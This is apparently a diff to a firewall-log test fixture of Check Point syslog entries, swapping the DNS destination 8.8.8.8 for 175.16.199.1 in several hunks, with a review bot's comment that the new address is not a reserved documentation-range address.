 <134>1 2020-03-29T17:22:47Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"393216"; ifdir:"inbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80d968,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.2.2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43584"; service:"22"; src:"192.168.1.205"; tcp_flags:"PUSH-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T17:22:47Z gw-da58d3 CheckPoint 8363 - [flags:"393280"; ifdir:"inbound"; loguid:"{0x5e80d968,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; blade_name:"Anti Bot & Anti Virus"; information:"policy installation for blade Anti Bot & Anti Virus completed successfully"; product:"Log Update"]
 <134>1 2020-03-29T17:22:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d968,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -2695,7 +2695,7 @@
 <134>1 2020-03-29T17:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d98f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59259"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d98f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62014"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10033"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d990,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d990,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59349"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34867"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:23:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d990,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42640"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10034"; xlatesrc:"0.0.0.0"]
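Review bot: The replacement destination `175.16.199.1` on the `+` line of this hunk (and the identical substitution in the hunks at `@@ -2758` and `@@ -2794`) is not in an RFC 5737 documentation range (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) and appears to be a publicly allocated address, so the fixture still points at a live third party rather than a reserved one. The `8.8.8.8` it replaces is also a live address, so this is not a regression, but if the new value was chosen so that the pipeline's geoip enrichment yields a stable, deterministic expected result — which is what the uniform swap suggests — that rationale should be recorded in the fixture directory's README or next to the expected-output file, since a log line cannot carry a comment. Otherwise a documentation-range address would serve the same purpose without naming a real host.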
@@ -2758,7 +2758,7 @@
 <134>1 2020-03-29T17:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9be,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9bf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36115"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:24:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52172"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9c1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41603"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60757"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9c1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53770"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10060"; xlatesrc:"0.0.0.0"]
@@ -2794,20 +2794,20 @@
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37572"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10066"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57574"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9e4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62642"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10067"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59723"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59723"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54328"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9ee,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
